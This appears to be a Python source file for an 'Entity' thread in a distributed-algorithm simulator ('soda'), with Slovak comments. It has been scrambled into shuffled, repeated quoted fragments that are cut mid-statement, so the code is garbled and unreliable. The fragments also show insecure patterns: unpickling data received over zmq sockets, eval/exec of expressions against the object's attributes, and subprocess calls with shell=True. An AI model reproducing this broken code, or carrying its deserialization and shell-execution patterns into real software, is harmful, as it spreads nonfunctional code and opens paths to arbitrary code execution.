_self._actions[\"EVALUATE\"](str(_expression))", "in _self._term_states: _current_state = _self._state # Entita sa spustí impulzom alebo začne čítať", "_state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id = _id _self._ip = _ip _self._in_port =", "{0} | Action: Started by IMPULSE \".format(_self._id)) else: _self._read_lock = True _behavior =", "_message = (_message, ) # Ak je prijímateľ iba jeden pretypujeme ho na", "_state _self._term_states = _term_states _self._states_behaviors = _states_behaviors _self._neighbours = _neighbours _self._impulse = False", "= _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action: RECEIVED | Message", "eval(_expression, {}, _self.__dict__) except NameError as _Name: _logger.info(\"Entity: {0} | 
Action: EVALUATE |", "identifikátorom odosieľatela a zvýšíme počet # odoslaných správ pre entitu o 1. for", "exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0} | Action: ASSIGN | Expression : {1} \".format(_self._id,", "ktoré sú premennými dostali konkrétne hodnity. _message = _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if", "Action: BECOME | Old state : {1} | New state : {2} \".format(_self._id,", "_logger.info(\"Entity: {0} | Action: SEND | Trying to send message to non existing", "Pre uskutočnenie priradenia do nejakej premennej využívame funkciu exec(), # ktorá je jednou", "try: result = eval(_expression, {}, _self.__dict__) except NameError as _Name: _logger.info(\"Entity: {0} |", "\"%s = %s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\": read, \"SEND\":", "_result.append(False) else: _result.append(None) # Ak v v poli _result nie je hodnota False", "prijatá správa # sa zhoduje so vzorom. if False not in _result: #", "_result.append(None) # Ak v v poli _result nie je hodnota False znamená to,", "sú uchované všetky aktuálne referencie premenných a ich hodnôt. try: exec(_expression, {}, _self.__dict__)", "{0} | Action: EXEC | Wrong value for output cast to int! ->", "= _n.execute(_self) elif type(_n) is IfNode: _next_node = _n.execute(_self) if _next_node == \"BECOME\":", "[] # Porovnáme správu so vzorom. Ak je na rovnakej pozícii vo vzore", "Thread from pickle import dumps, loads from logging import getLogger from soda.helpers import", "lokálnym # premenným entity, ktoré používateľ opísal v algoritme je nutné predať funkcii", "elif _output_type == 'float': try: _process_output = float(_completed_process.stdout) except ValueError as _Value: _logger.info(", "-> {2} \".format(_self._id, _Attribute, _expression)) exit() except TypeError as _Type: _logger.info(\"Entity: {0} |", "| Wrong value! 
-> {1} -> {2} \".format(_self._id, _Value,_expression)) exit() return result @support_arguments", "@support_arguments def remove(_array, _value): _expression = \"%s.remove(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def", "funkcia exec() prístup ku všetkým lokálnym # premenným entity, ktoré používateľ opísal v", "sme mohli následne v metóde run() identifikovať # správanie príslušné tomuto vzoru. return", "Action: EVALUATE | Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Attribute,", "1. for _n in _recipients: try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content", "priradenia do nejakej premennej využívame funkciu exec(), # ktorá je jednou zo vstavaných", "\"'\" elif _output_type == 'int': try: _process_output = int(_completed_process.stdout) except ValueError as _Value:", "len(_received_message): for _i, _j in zip(_pattern[1], _received_message): if _i == _j and type(_i)", "pole. if type(_recipients) is int: _recipients = [_recipients] * 1 # Pre každého", "def log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result = None try: result", "vzore a # prijatej správe tá istá hodnota a vo vzore nieje na", "zip(_pattern[1], _received_message): if _i == _j and type(_i) is not tuple: _result.append(True) elif", "'float': try: _process_output = float(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} |", "= \"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value): _expression = \"%s.remove(%s)\"", "_self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output): _expression = \"%s = %s.pop()\" % (_output, _array)", "is not None: # Vykonáme logiku uzlu. Logika uzlov je opísaná # v", "hodnotu None. 
if len(_pattern[1]) == len(_received_message): for _i, _j in zip(_pattern[1], _received_message): if", "getLogger from soda.helpers import support_arguments from soda.distributed_environment.behavior import ActionNode, IfNode from subprocess import", "_i != _j and type(_i) is not tuple: _result.append(False) else: _result.append(None) # Ak", "v v poli _result nie je hodnota False znamená to, že prijatá správa", "použitelnej premennej. _self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0} | Action: READ | Message :", "{1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec vrátime vzor,", "vzoru. return _pattern @support_arguments def send(_message, _recipients): # Vykonáme evaluáciu správy a prijímateľov", ")) # Uložíme odosieľatela do použitelnej premennej. _self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0} |", "_p != 'IMPULSE', _self._states_behaviors[_self._state])): _result = [] # Porovnáme správu so vzorom. Ak", "in zip(_pattern[1], _received_message): if type(_i) is tuple: _identifier, _ = _i if type(_j)", "# Uložíme odosieľatela do použitelnej premennej. _self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0} | Action:", "odošleme správu spolu s identifikátorom odosieľatela a zvýšíme počet # odoslaných správ pre", "_self._term_states: exit() @support_arguments def assign(_expression): # Pre uskutočnenie priradenia do nejakej premennej využívame", "type of identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except TypeError", "{2} \".format(_self._id, _Attribute, _expression)) exit() except TypeError as _Type: _logger.info(\"Entity: {0} | Action:", "prijatej správe tá istá hodnota a vo vzore nieje na poziícii premenná #", "premenná si uložíme hodnotu None. 
if len(_pattern[1]) == len(_received_message): for _i, _j in", "+ _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result = None try: result = eval(_expression, {}, _self.__dict__)", "Action: SEND | Trying to send message to non existing neighbour! -> {1}", "stav. _n = _self._states_behaviors[_current_state][_behavior].head _next_node = None # Iterujeme cez správanie. while _n", "_expression)) exit() @support_arguments def log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result =", "_context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller = Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS", "{0} | Action: EVALUATE | Wrong type of identifier! -> {1} -> {2}", "not tuple: _result.append(False) else: _result.append(None) # Ak v v poli _result nie je", "so správou, ktorú sme # prijali aby sme mohli následne v metóde run()", "existing neighbour! -> {1} \".format(_self._id, _n)) @support_arguments def become(_new_state): _logger.info(\"Entity: {0} | Action:", "Uložíme odosieľatela do použitelnej premennej. _self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0} | Action: READ", "následne v metóde run() identifikovať # správanie príslušné tomuto vzoru. return _pattern @support_arguments", "{ \"READ\": read, \"SEND\": send, \"BECOME\": become, \"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\": evaluate,", "soda.distributed_environment.behavior import ActionNode, IfNode from subprocess import run, PIPE from shlex import split", "do terminujúceho stavu. 
while _self._state not in _self._term_states: _current_state = _self._state # Entita", "_self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller = Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS =", "_input): _command = split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process = run(_command, input=str(_input),", "execute, \"ADD\": add, \"REMOVE\": remove, \"POP\": pop } def run(_self): # Entita vykonáva", "{1} | To entity : {2} \".format(_self._id, _message, _n)) _self._count_sent_messages += 1 except", "podkapitole 4.2.3 Správanie. if type(_n) is ActionNode: _next_node = _n.execute(_self) elif type(_n) is", "znamená to, že prijatá správa # sa zhoduje so vzorom. if False not", "Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS = [_n for _n in _neighbours]", "True: _socks = dict(_poller.poll()) # Ak prišla správa. if _socks.get(_self._in_socket) == POLLIN: #", "# uložíme si do premennej _result hodnotu True. Ak sa hodnoty nezhodujú #", "_expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong", "# Entita sa spustí impulzom alebo začne čítať prijaté správy. 
if _self._impulse: _self._impulse", "opísal v algoritme je nutné predať funkcii # exec() prostredníctvom tretieho argumenty atribút", "= getLogger(__name__) class Entity(Thread): def __init__(_self, _id, _ip, _in_port, _state, _term_states, _states_behaviors, _neighbours):", "_i == _j and type(_i) is not tuple: _result.append(True) elif _i != _j", "_logger = getLogger(__name__) class Entity(Thread): def __init__(_self, _id, _ip, _in_port, _state, _term_states, _states_behaviors,", "[_n for _n in _neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] = len def read():", "result = None try: result = eval(_expression, {}, _self.__dict__) except NameError as _Name:", "# kde je vo vzore premenná si uložíme hodnotu None. if len(_pattern[1]) ==", "# argumentov, ktoré sú premennými dostali konkrétne hodnity. _message = _self._actions[\"EVALUATE\"](str(_message)) _recipients =", "| Action: EXEC | Wrong value for output cast to float! -> {1}", "správa. while True: _socks = dict(_poller.poll()) # Ak prišla správa. if _socks.get(_self._in_socket) ==", "except ValueError as _Value: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong value! ->", "prečítame a následne extrahujeme obsah správy a odosieľatela. _pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id", "| Action: EVALUATE | Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression))", "ktorom # sú uchované všetky aktuálne referencie premenných a ich hodnôt. try: exec(_expression,", "v ktorom # sú uchované všetky aktuálne referencie premenných a ich hodnôt. try:", "_expression = \"%s = %s\" % (_identifier, _j) # Využijeme akciu entity pre", "_self._states_behaviors[_current_state][_behavior].head _next_node = None # Iterujeme cez správanie. while _n is not None:", "hodnotu z príslušnej # pozície v správe do tejto premennej. 
for _i, _j", "na rovnakej pozícii vo vzore a # prijatej správe tá istá hodnota a", "exit() except TypeError as _Type: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type", "# Ak v v poli _result nie je hodnota False znamená to, že", "# pozície v správe do tejto premennej. for _i, _j in zip(_pattern[1], _received_message):", "for _n in _recipients: try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content =", "_recipients: try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id) _pickled_message", "<gh_stars>0 from zmq import Context, DONTWAIT, Poller, POLLIN, DEALER from threading import Thread", "vstavaných funkcií jazyka Python. Exec() dokáže vykonať # akýkolvek valídny Python príkaz. Príkaz,", "'string': _process_output = \"'\" + _completed_process.stdout + \"'\" elif _output_type == 'int': try:", "_ip, _in_port, _state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id = _id _self._ip = _ip", "_new_state)) # Entita zmení svoj stav na nový. _self._state = _new_state # Ak", "assign, \"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\": add, \"REMOVE\": remove, \"POP\": pop", "vzore premenná uložíme hodnotu z príslušnej # pozície v správe do tejto premennej.", "as _Name: _logger.info(\"Entity: {0} | Action: EVALUATE | Undefined identifier! -> {1} ->", "_logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of identifier! -> {1} ->", "type(_recipients) is int: _recipients = [_recipients] * 1 # Pre každého prijímateľa vytvoríme", "from pickle import dumps, loads from logging import getLogger from soda.helpers import support_arguments", "všetky aktuálne referencie premenných a ich hodnôt. try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0}", "v metóde run() identifikovať # správanie príslušné tomuto vzoru. 
return _pattern @support_arguments def", "_id _self._ip = _ip _self._in_port = _in_port _self._state = _state _self._term_states = _term_states", "nutné predať funkcii # exec() prostredníctvom tretieho argumenty atribút objektu __dict__, v ktorom", "to correct output type if _output_type == 'string': _process_output = \"'\" + _completed_process.stdout", "_self._state not in _self._term_states: _current_state = _self._state # Entita sa spustí impulzom alebo", "extrahujeme obsah správy a odosieľatela. _pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity:", "_message_content = (_message, _self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného poslania", "vzormi READ konštrukcií pre # aktuálny stav. for _pattern in list(filter(lambda _p: _p", "aktuálne referencie premenných a ich hodnôt. try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0} |", "metóde run() identifikovať # správanie príslušné tomuto vzoru. return _pattern @support_arguments def send(_message,", "| Expression : {1} \".format(_self._id, _expression)) except NameError as _Name: _logger.info(\"Entity: {0} |", "v algoritme je nutné predať funkcii # exec() prostredníctvom tretieho argumenty atribút objektu", ": {2} \".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme prijatú správu so všetkými vzormi READ", "správy. _logger.info(\"Entity: {0} | Action: SEND | Trying to send message to non", "support_arguments from soda.distributed_environment.behavior import ActionNode, IfNode from subprocess import run, PIPE from shlex", "PIPE from shlex import split from copy import deepcopy _logger = getLogger(__name__) class", "| Action: EXEC | Wrong value for output cast to int! -> {1}", "na pole. 
if type(_recipients) is int: _recipients = [_recipients] * 1 # Pre", "funkciu exec(), # ktorá je jednou zo vstavaných funkcií jazyka Python. Exec() dokáže", "_neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] = len def read(): # V nekonečnom cykle", "hodnoty nezhodujú # a vo vzore nie je na pozícii premenná úložíme hodnotu", ": {1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme prijatú", "= %s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\": read, \"SEND\": send,", "premenná # uložíme si do premennej _result hodnotu True. Ak sa hodnoty nezhodujú", "run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True) # cast to correct output type if _output_type", "_received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action: RECEIVED | Message : {1}", "_self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action: RECEIVED | Message :", "in _self._term_states: exit() @support_arguments def assign(_expression): # Pre uskutočnenie priradenia do nejakej premennej", "_j and type(_i) is not tuple: _result.append(False) else: _result.append(None) # Ak v v", "= (_message, _self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného poslania správy.", "_j in zip(_pattern[1], _received_message): if _i == _j and type(_i) is not tuple:", "# odoslaných správ pre entitu o 1. for _n in _recipients: try: _out_socket", "# Ak je prijímateľ iba jeden pretypujeme ho na pole. if type(_recipients) is", "_pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného poslania správy. Zaznamenaný je identifikátor", "vykonať je definovaný # reťazcom _expression. 
Aby mala funkcia exec() prístup ku všetkým", "-> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except TypeError as _Type: _logger.info(\"Entity:", "@support_arguments def add(_array, _value): _expression = \"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def", "\"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value): _expression = \"%s.remove(%s)\" %", "(_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value): _expression = \"%s.append(%s)\" % (_array, _value)", "def remove(_array, _value): _expression = \"%s.remove(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array,", "soket typu DEALER [18]. Následne # odošleme správu spolu s identifikátorom odosieľatela a", "= _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not tuple: _message = (_message,", "@support_arguments def pop(_array, _output): _expression = \"%s = %s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,))", "{2} \".format(_self._id, _Type, _expression)) exit() @support_arguments def log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def", ": {2} \".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec vrátime vzor, ktorý sa zhodoval so", "nekonečnom cykle sledujeme, či na soket prišla správa. while True: _socks = dict(_poller.poll())", "premennej _result hodnotu True. Ak sa hodnoty nezhodujú # a vo vzore nie", "ma exec vykonať je definovaný # reťazcom _expression. Aby mala funkcia exec() prístup", "AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of identifier!", "si uložíme hodnotu None. 
if len(_pattern[1]) == len(_received_message): for _i, _j in zip(_pattern[1],", "premennej využívame funkciu exec(), # ktorá je jednou zo vstavaných funkcií jazyka Python.", "import run, PIPE from shlex import split from copy import deepcopy _logger =", "False not in _result: # Pre pozície kde je vo vzore premenná uložíme", "definovaný # reťazcom _expression. Aby mala funkcia exec() prístup ku všetkým lokálnym #", "Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression)) exit() except AttributeError as", "-> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() _expression = \"%s = %s\"", "_logger.info(\"Entity: {0} | Action: RECEIVED | Message : {1} | From entity :", "priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela do použitelnej premennej. _self.i_SENDER = _sender_entity_id _logger.info(\"Entity:", "_recipients = [_recipients] * 1 # Pre každého prijímateľa vytvoríme nový soket typu", "# Vykonáme evaluáciu správy a prijímateľov aby sme napríklad v prípade # argumentov,", "všetkým lokálnym # premenným entity, ktoré používateľ opísal v algoritme je nutné predať", "_j in zip(_pattern[1], _received_message): if type(_i) is tuple: _identifier, _ = _i if", "run, PIPE from shlex import split from copy import deepcopy _logger = getLogger(__name__)", "= len def read(): # V nekonečnom cykle sledujeme, či na soket prišla", "# Ak je tento nový stav terminujúci tak ukončíme správanie. if _self._state in", "| Action: EVALUATE | Wrong type of identifier! -> {1} -> {2} \".format(_self._id,", "| From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme prijatú správu so", "\".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec vrátime vzor, ktorý sa zhodoval so správou, ktorú", "Iterujeme cez správanie. while _n is not None: # Vykonáme logiku uzlu. Logika", "if type(_j) is str: _j = \"'\" + _j + \"'\" _expression =", "aktuálny stav. 
for _pattern in list(filter(lambda _p: _p != 'IMPULSE', _self._states_behaviors[_self._state])): _result =", "Expression : {1} \".format(_self._id, _expression)) except NameError as _Name: _logger.info(\"Entity: {0} | Action:", "+= 1 except KeyError: # Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity: {0} | Action:", "zvýšíme počet # odoslaných správ pre entitu o 1. for _n in _recipients:", "def assign(_expression): # Pre uskutočnenie priradenia do nejakej premennej využívame funkciu exec(), #", "{0} | Action: EXEC | Wrong value for output cast to float! ->", "# Porovnáme správu so vzorom. Ak je na rovnakej pozícii vo vzore a", "_poller = Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS = [_n for _n", "def __init__(_self, _id, _ip, _in_port, _state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id = _id", "_self._id = _id _self._ip = _ip _self._in_port = _in_port _self._state = _state _self._term_states", "sa zhodoval so správou, ktorú sme # prijali aby sme mohli následne v", "as _Value: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong value! -> {1} ->", "pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela do použitelnej premennej. _self.i_SENDER = _sender_entity_id", "tomuto vzoru. return _pattern @support_arguments def send(_message, _recipients): # Vykonáme evaluáciu správy a", "add, \"REMOVE\": remove, \"POP\": pop } def run(_self): # Entita vykonáva správanie pokiaľ", "# akýkolvek valídny Python príkaz. Príkaz, ktorý ma exec vykonať je definovaný #", "Entita sa spustí impulzom alebo začne čítať prijaté správy. if _self._impulse: _self._impulse =", "for output cast to float! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit()", "run(_self): # Entita vykonáva správanie pokiaľ sa nedostane do terminujúceho stavu. while _self._state", "while True: _socks = dict(_poller.poll()) # Ak prišla správa. 
if _socks.get(_self._in_socket) == POLLIN:", "= int(_id) _self.i_NEIGHBOURS = [_n for _n in _neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN']", "if len(_pattern[1]) == len(_received_message): for _i, _j in zip(_pattern[1], _received_message): if _i ==", "_self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela do použitelnej premennej. _self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0}", "a prijímateľov aby sme napríklad v prípade # argumentov, ktoré sú premennými dostali", "_socks.get(_self._in_socket) == POLLIN: # Správu prečítame a následne extrahujeme obsah správy a odosieľatela.", "* 1 # Pre každého prijímateľa vytvoríme nový soket typu DEALER [18]. Následne", "vrátime vzor, ktorý sa zhodoval so správou, ktorú sme # prijali aby sme", "_Name: _logger.info(\"Entity: {0} | Action: ASSIGN | Undefined identifier! -> {1} -> {2}", "zhodoval so správou, ktorú sme # prijali aby sme mohli následne v metóde", "_self._term_states: _current_state = _self._state # Entita sa spustí impulzom alebo začne čítať prijaté", "(_identifier, _j) # Využijeme akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela", "\".format(_self._id, _Name, _expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: ASSIGN", "while _self._state not in _self._term_states: _current_state = _self._state # Entita sa spustí impulzom", "_n is not None: # Vykonáme logiku uzlu. Logika uzlov je opísaná #", "prijatú správu so všetkými vzormi READ konštrukcií pre # aktuálny stav. for _pattern", "_sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action: RECEIVED | Message : {1} |", "vo vzore nieje na poziícii premenná # uložíme si do premennej _result hodnotu", "= \"'\" + _j + \"'\" _expression = \"%s = %s\" % (_identifier,", "+ \"'\" elif _output_type == 'int': try: _process_output = int(_completed_process.stdout) except ValueError as", "stav. 
for _pattern in list(filter(lambda _p: _p != 'IMPULSE', _self._states_behaviors[_self._state])): _result = []", "while _n is not None: # Vykonáme logiku uzlu. Logika uzlov je opísaná", "_neighbours): Thread.__init__(_self) _self._id = _id _self._ip = _ip _self._in_port = _in_port _self._state =", "_context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT)", "# Porovnámme prijatú správu so všetkými vzormi READ konštrukcií pre # aktuálny stav.", "_command = split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process = run(_command, input=str(_input), stdout=PIPE,", "BECOME | Old state : {1} | New state : {2} \".format(_self._id, _self._state,", "atribút objektu __dict__, v ktorom # sú uchované všetky aktuálne referencie premenných a", "DONTWAIT, Poller, POLLIN, DEALER from threading import Thread from pickle import dumps, loads", ": {1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec vrátime", "{1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except ValueError as _Value: _logger.info(\"Entity: {0}", "hodnotu False. Pre pozície # kde je vo vzore premenná si uložíme hodnotu", "_identifier, _ = _i if type(_j) is str: _j = \"'\" + _j", "| Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit()", "sme # prijali aby sme mohli následne v metóde run() identifikovať # správanie", "DEALER [18]. 
Následne # odošleme správu spolu s identifikátorom odosieľatela a zvýšíme počet", "_received_message, _sender_entity_id)) # Nakoniec vrátime vzor, ktorý sa zhodoval so správou, ktorú sme", "{1} | New state : {2} \".format(_self._id, _self._state, _new_state)) # Entita zmení svoj", "_output_type == 'int': try: _process_output = int(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity:", "int(_id) _self.i_NEIGHBOURS = [_n for _n in _neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] =", "except ValueError as _Value: _logger.info( \"Entity: {0} | Action: EXEC | Wrong value", "-> {2} \".format(_self._id, _Attribute, _expression)) exit() except ValueError as _Value: _logger.info(\"Entity: {0} |", "def add(_array, _value): _expression = \"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array,", "dumps, loads from logging import getLogger from soda.helpers import support_arguments from soda.distributed_environment.behavior import", "_recipients): # Vykonáme evaluáciu správy a prijímateľov aby sme napríklad v prípade #", "tretieho argumenty atribút objektu __dict__, v ktorom # sú uchované všetky aktuálne referencie", "+ _completed_process.stdout + \"'\" elif _output_type == 'int': try: _process_output = int(_completed_process.stdout) except", "send, \"BECOME\": become, \"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\": add,", "_logger.info(\"Entity: {0} | Action: EVALUATE | Wrong value! -> {1} -> {2} \".format(_self._id,", "output cast to float! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() _expression", "None. if len(_pattern[1]) == len(_received_message): for _i, _j in zip(_pattern[1], _received_message): if _i", "hodnota False znamená to, že prijatá správa # sa zhoduje so vzorom. 
if", "= _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller = Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id)", "\" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result = None try: result = eval(_expression, {},", "Ak prišla správa. if _socks.get(_self._in_socket) == POLLIN: # Správu prečítame a následne extrahujeme", "odoslania správy. _logger.info(\"Entity: {0} | Action: SEND | Trying to send message to", "Poller, POLLIN, DEALER from threading import Thread from pickle import dumps, loads from", "_i, _j in zip(_pattern[1], _received_message): if _i == _j and type(_i) is not", "-> {1} -> {2} \".format(_self._id, _Value,_expression)) exit() return result @support_arguments def execute(_command, _output_type,", "_out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id) _pickled_message = dumps(_message_content)", "prišla správa. while True: _socks = dict(_poller.poll()) # Ak prišla správa. if _socks.get(_self._in_socket)", "_states_behaviors _self._neighbours = _neighbours _self._impulse = False _self._read_lock = False _self._count_sent_messages = 0", "_self._state = _state _self._term_states = _term_states _self._states_behaviors = _states_behaviors _self._neighbours = _neighbours _self._impulse", "cykle sledujeme, či na soket prišla správa. while True: _socks = dict(_poller.poll()) #", "identifikovať # správanie príslušné tomuto vzoru. return _pattern @support_arguments def send(_message, _recipients): #", "správy. Zaznamenaný je identifikátor # odosielateľa, prijímateľa a samotná správa. _logger.info(\"Entity: {0} |", "identifier! 
-> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except ValueError as _Value:", "_i if type(_j) is str: _j = \"'\" + _j + \"'\" _expression", "NameError as _Name: _logger.info(\"Entity: {0} | Action: EVALUATE | Undefined identifier! -> {1}", "elif type(_n) is IfNode: _next_node = _n.execute(_self) if _next_node == \"BECOME\": break _n", "for _i, _j in zip(_pattern[1], _received_message): if _i == _j and type(_i) is", "in zip(_pattern[1], _received_message): if _i == _j and type(_i) is not tuple: _result.append(True)", "| Action: ASSIGN | Wrong type of identifier! -> {1} -> {2} \".format(_self._id,", "v prípade # argumentov, ktoré sú premennými dostali konkrétne hodnity. _message = _self._actions[\"EVALUATE\"](str(_message))", "algoritme je nutné predať funkcii # exec() prostredníctvom tretieho argumenty atribút objektu __dict__,", "správa. if _socks.get(_self._in_socket) == POLLIN: # Správu prečítame a následne extrahujeme obsah správy", "become, \"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\": add, \"REMOVE\": remove,", "je vo vzore premenná uložíme hodnotu z príslušnej # pozície v správe do", "a odosieľatela. _pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action:", "input=str(_input), stdout=PIPE, universal_newlines=True, shell=True) # cast to correct output type if _output_type ==", "_self._term_states = _term_states _self._states_behaviors = _states_behaviors _self._neighbours = _neighbours _self._impulse = False _self._read_lock", "False # Nastavíme _n na prvý uzol správania príslušného pre aktuálny stav. _n", "{1} -> {2} \".format(_self._id, _Value,_expression)) exit() return result @support_arguments def execute(_command, _output_type, _output,", "{0} | Action: EVALUATE | Wrong value! 
